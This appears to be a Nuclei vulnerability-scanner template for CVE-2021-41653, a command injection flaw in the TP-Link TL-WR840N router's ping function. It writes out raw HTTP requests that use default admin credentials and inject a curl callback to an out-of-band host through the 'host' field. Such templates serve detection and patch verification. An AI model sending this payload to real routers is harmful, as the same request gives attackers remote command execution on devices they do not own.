id: CVE-2021-41653 info: name: TP-Link - OS Command Injection author: gy741 severity: critical description: The PING function on the TP-Link TL-WR840N EU v5 router with firmware through TL-WR840N(EU)_V5_171211 is vulnerable to remote code execution via a specially crafted payload in an IP address input field. remediation: Upgrade the firmware to at least version "TL-WR840N(EU)_V5_211109". reference: - https://k4m1ll0.com/cve-2021-41653.html - https://nvd.nist.gov/vuln/detail/CVE-2021-41653 - https://www.tp-link.com/us/press/security-advisory/ - http://tp-link.com classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-41653 cwe-id: CWE-94 epss-score: 0.95374 epss-percentile: 0.99171 cpe: cpe:2.3:o:tp-link:tl-wr840n_firmware:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: tp-link product: tl-wr840n_firmware tags: cve,cve2021,tplink,rce,router variables: useragent: '{{rand_base(6)}}' http: - raw: - | POST /cgi?2 HTTP/1.1 Host: {{Hostname}} Content-Type: text/plain Referer: http://{{Hostname}}/mainFrame.htm Cookie: Authorization=Basic YWRtaW46YWRtaW4= [IPPING_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,6 dataBlockSize=64 timeout=1 numberOfRepetitions=4 host=$(echo 127.0.0.1; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}') X_TP_ConnName=ewan_ipoe_d diagnosticsState=Requested - | POST /cgi?7 HTTP/1.1 Host: {{Hostname}} Content-Type: text/plain Referer: http://{{Hostname}}/mainFrame.htm Cookie: Authorization=Basic YWRtaW46YWRtaW4= [ACT_OP_IPPING#0,0,0,0,0,0#0,0,0,0,0,0]0,0 matchers-condition: and matchers: - type: word part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" - type: word part: interactsh_request words: - "User-Agent: {{useragent}}" # digest: 4b0a00483046022100b8e0dd9a669b65fde3dd22f5ce85f27aae2cc1f5904d0d67c52cc4c99bf7d0f6022100c8543cc2580aafea3273fe3fc58428f48e40e596a85cba7cd0b0f730e792b5c3:922c64590222798bb761d5b6d8e72950